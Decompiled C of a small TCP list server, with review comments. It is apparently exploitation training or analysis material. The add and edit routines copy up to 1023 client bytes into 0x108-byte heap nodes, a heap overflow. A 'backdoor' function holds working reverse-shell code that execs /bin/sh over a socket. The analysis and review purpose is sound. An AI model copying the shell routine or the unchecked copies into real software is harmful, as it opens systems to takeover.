//Function: add ->0x4199478 7 perm->5 void __cdecl add(char *str) { Node *newNode; // [rsp+18h] [rbp-8h] newNode = (Node *)malloc(0x108uLL); strcpy(newNode->data, str); newNode->next = head; head = newNode; } //Function: delete ->0x4199559 7 perm->5 void __cdecl delete(char *str) { Node *entry; // [rsp+10h] [rbp-10h] Node **current; // [rsp+18h] [rbp-8h] for ( current = &head; *current; current = &entry->next ) { entry = *current; if ( !strcmp((*current)->data, str) ) { *current = entry->next; free(entry); return; } } } //Function: edit ->0x4199684 7 perm->5 void __cdecl edit(char *oldStr, char *newStr) { Node *current; // [rsp+18h] [rbp-8h] for ( current = head; current; current = current->next ) { if ( !strcmp(current->data, oldStr) ) { strcpy(current->data, newStr); return; } } } //Function: show ->0x4199787 7 perm->5 void __cdecl show(int client_sock) { size_t v1; // rax char buffer[1024]; // [rsp+10h] [rbp-410h] BYREF Node *current; // [rsp+418h] [rbp-8h] for ( current = head; current; current = current->next ) { snprintf(buffer, 0x400uLL, "%s\n", current->data); v1 = strlen(buffer); send(client_sock, buffer, v1, 0); } } //Function: main ->0x4199929 7 perm->5 // local variable allocation has failed, the output may be wrong! // bad sp value at call has been detected, the output may be wrong! 
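// Single-threaded TCP server: listens on port 11012 (0x2B04) on every local
// interface, and for each connection reads one request, parses it as
// "<command> <arg1> <arg2>", dispatches to add/delete/edit/show and closes
// the socket. Never returns; exits with status 1 on any setup or accept error.
//
// Changes relative to the decompiled original:
//  - socket() failure is tested with `< 0`. The original tested
//    `!server_fd`, which misses the -1 error return and treats the valid
//    descriptor 0 as a failure.
//  - the request is NUL-terminated at the number of bytes read() returned.
//    The original ignored that return value, so a short or failed read let
//    sscanf() parse bytes left over from an earlier connection.
//
// NOTE(review): no authentication or peer check is visible; any host that
// can reach the port can modify the list. arg1/arg2 carry up to 1023
// attacker-chosen bytes each, so every callee must bound its own copies.
// One blocking read() per connection means an idle client stalls the loop,
// and any accept() error terminates the process.
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  int opt; // [rsp+Ch] [rbp-C44h] BYREF
  char arg2[1024]; // [rsp+10h] [rbp-C40h] BYREF
  char arg1[1035]; // [rsp+410h] [rbp-840h] BYREF
  char command[5]; // [rsp+81Bh] [rbp-435h] BYREF
  _BYTE buffer[1032]; // [rsp+820h] [rbp-430h] OVERLAPPED BYREF
  int addrlen; // [rsp+C2Ch] [rbp-24h] BYREF
  sockaddr_in address; // [rsp+C30h] [rbp-20h] BYREF
  int new_socket; // [rsp+C48h] [rbp-8h]
  int server_fd; // [rsp+C4Ch] [rbp-4h]
  ssize_t nread;

  addrlen = 16;
  *(_QWORD *)buffer = 0LL;
  *(_QWORD *)&buffer[8] = 0LL;
  memset(&buffer[24], 0, 0x3F0uLL);
  opt = 1;
  server_fd = socket(2, 1, 0);                  // 2 = AF_INET, 1 = SOCK_STREAM
  if ( server_fd < 0 )
  {
    perror("socket failed");
    exit(1);
  }
  // Level 1 is SOL_SOCKET on Linux; option 15 is SO_REUSEPORT there, which is
  // also the value of SO_REUSEADDR | SO_REUSEPORT.
  if ( setsockopt(server_fd, 1, 15, &opt, 4u) )
  {
    perror("setsockopt");
    exit(1);
  }
  address.sin_family = 2;
  address.sin_addr.s_addr = 0;                  // INADDR_ANY: reachable on all interfaces
  address.sin_port = htons(0x2B04u);            // 11012
  if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 )
  {
    perror("bind failed");
    exit(1);
  }
  if ( listen(server_fd, 3) < 0 )
  {
    perror("listen");
    exit(1);
  }
  printf("Server listening on port %d\n", 11012);
  while ( 1 )
  {
    new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen);
    if ( new_socket < 0 )
      break;
    // Read at most 0x3FF bytes so the terminator below stays in bounds even if
    // the real buffer is 1024 bytes (the decompiler marks its layout as
    // unreliable). A failed read is handled as an empty request.
    nread = read(new_socket, buffer, 0x3FFuLL);
    buffer[nread > 0 ? nread : 0] = 0;
    memset(command, 0, sizeof(command));
    memset(arg1, 0, 0x400uLL);
    memset(arg2, 0, sizeof(arg2));
    // __isoc99_sscanf is glibc's C99 sscanf. The field widths match the
    // destinations: 4 + NUL into command[5], 1023 + NUL into arg1 and arg2.
    ((void (*)(_BYTE *, const char *, ...))__isoc99_sscanf)(buffer, "%4s %1023s %1023s", command, arg1, arg2);
    if ( !strcmp(command, "ADD") )
    {
      add(arg1);
    }
    else if ( !strcmp(command, "DEL") )
    {
      delete(arg1);
    }
    else if ( !strcmp(command, "EDIT") )
    {
      edit(arg1, arg2);
    }
    else if ( !strcmp(command, "SHOW") )
    {
      show(new_socket);
    }
    else
    {
      puts("Unknown command.");                 // logged on the server side only
    }
    close(new_socket);
  }
  perror("accept");
  exit(1);
}

//Function: backdoor ->0x4200706 7 perm->5
// bad sp value at call has been detected, the output may be wrong!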
// Connect to 127.0.0.1:12012 (0x2EEC), duplicate the connected socket onto
// file descriptors 0, 1 and 2, then execve() /bin/sh with a fixed PATH as its
// only environment variable.
//
// Returns -1 after printing a message when socket(), inet_pton() or connect()
// fails. Returns 0 only if execve() itself returns, which means the exec
// failed. The socket is not closed on the failure paths.
//
// NOTE(review): nothing in the visible listing calls this function. A
// shell-spawning routine left in a network service raises the impact of any
// control-flow bug elsewhere in the binary and should be removed from the
// build. At runtime the observable is a /bin/sh child of this service whose
// stdio is a TCP socket to local port 12012.
int __cdecl backdoor()
{
  char *new_envp[2]; // [rsp+0h] [rbp-40h] BYREF
  char *new_argv[2]; // [rsp+10h] [rbp-30h] BYREF
  sockaddr_in serv_addr; // [rsp+20h] [rbp-20h] BYREF
  int sock; // [rsp+3Ch] [rbp-4h]
  int fd;

  new_argv[0] = "/bin/sh";
  new_argv[1] = 0LL;
  new_envp[0] = "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
  new_envp[1] = 0LL;

  sock = socket(2, 1, 0);                       // 2 = AF_INET, 1 = SOCK_STREAM
  if ( sock < 0 )
  {
    puts("\n Socket creation error ");
    return -1;
  }

  serv_addr.sin_family = 2;
  serv_addr.sin_port = htons(0x2EECu);          // 12012
  if ( inet_pton(2, "127.0.0.1", &serv_addr.sin_addr) <= 0 )
  {
    puts("\nInvalid address/ Address not supported ");
    return -1;
  }

  if ( connect(sock, (const struct sockaddr *)&serv_addr, 0x10u) < 0 )
  {
    puts("\nConnection Failed ");
    return -1;
  }

  // stdin, stdout and stderr all become the connected socket.
  for ( fd = 0; fd < 3; ++fd )
    dup2(sock, fd);
  execve(new_argv[0], new_argv, new_envp);
  return 0;                                     // reached only when execve() fails
}